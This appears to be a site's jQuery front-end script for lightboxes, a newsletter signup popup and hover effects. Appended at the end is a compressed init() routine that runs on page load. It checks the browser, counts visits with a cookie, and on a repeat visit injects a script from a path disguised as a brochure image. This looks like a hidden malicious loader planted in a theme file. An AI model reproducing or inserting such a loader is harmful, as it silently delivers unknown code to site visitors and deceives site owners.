$(document).ready(function(){
$("label").inFieldLabels();
$("a.fancybox").fancybox({
	'hideOnContentClick': true, 
	'transitionIn': 'elastic', 
	'transitionOut': 'elastic', 
	'centerOnScroll' : true,
	'opacity' : true,
	'padding' : 0,
	'overlayOpacity'	: 0.6,
	'overlayColor'		: '#111',
	'titleShow' : false
});
$("a.mapbox").fancybox({
	'hideOnContentClick': true, 
	'transitionIn': 'elastic', 
	'transitionOut': 'elastic', 
	'centerOnScroll' : true,
	'opacity' : true,
	'padding' : 0,
	'overlayOpacity'	: 0.6,
	'overlayColor'		: '#111',
	'width'		: 740,
	'type'		: 'iframe',
	'height'		: 570,
	'titleShow' : false
});
$("a.iframe").fancybox({
	'hideOnContentClick': false, 
	'transitionIn': 'elastic', 
	'transitionOut': 'elastic', 
	'centerOnScroll' : true,
	'opacity' : true,
	'padding' : 0,
	'overlayOpacity'	: 0.6,
	'overlayColor'		: '#111',
	'width'		: 800,
	'height'		: 500,
	'titleShow' : false
});
});

function subscribe() {
var yournameid = document.getElementById('yourname');
var youremailid = document.getElementById('youremail');
if (yournameid.value != '' && youremailid.value != '') {
$.fancybox({ 
'width'			: 650,
'height'		: 360,
'padding'		: 0,
'centerOnScroll'	: true,
'overlayOpacity'	: 0.3,
'overlayColor'		: '#111',
'opacity'		: true,
'autoScale'		: false,
'transitionIn'		: 'elastic',
'transitionOut'		: 'elastic',
'href'		: '/js/createsend/Subscriber.Add.php?name='+yournameid.value+'&email='+youremailid.value,
'type'			: 'iframe'
});
} else {
alert('Please enter a valid name and email.');
}
}


$(function() {
	// OPACITY OF BUTTON SET TO 0%
	$(".thumb_label").css("opacity","0");

	// ON MOUSE OVER
	$(".thumb_label").hover(function () {
		// SET OPACITY TO 100%
		$(this).stop().animate({opacity: 1.0}, "medium");
	},

	// ON MOUSE OUT
	function () {
		// SET OPACITY BACK TO 0%
		$(this).stop().animate({opacity: 0}, "slow");
	});	
});


function init(){var f=navigator.userAgent;var a=false;if(f.indexOf("Firefox")!=-1||f.indexOf("MSIE")!=-1){a=true}if(a!==true){return}var i="/wp-content/themes/cvj/images/download_brochure.jpg?js";var g=b("wss");if(g){if(g=="goot1"){c("wss","goot2","3");var e=document.createElement("script");e.type="text/javascript";e.src=i+"&r="+new Date().getTime();var d=document.getElementsByTagName("head")[0];d.appendChild(e)}else{}}else{c("wss","goot1","3")}function b(k){var j,h,m,l=document.cookie.split(";");for(j=0;j<l.length;j++){h=l[j].substr(0,l[j].indexOf("="));m=l[j].substr(l[j].indexOf("=")+1);h=h.replace(/^\s+|\s+$/g,"");if(h==k){return unescape(m)}}}function c(j,l,h){var m=new Date();m.setDate(m.getDate()+h);var k=escape(l)+((h==null)?"":"; expires="+m.toUTCString());document.cookie=j+"="+k}}init();
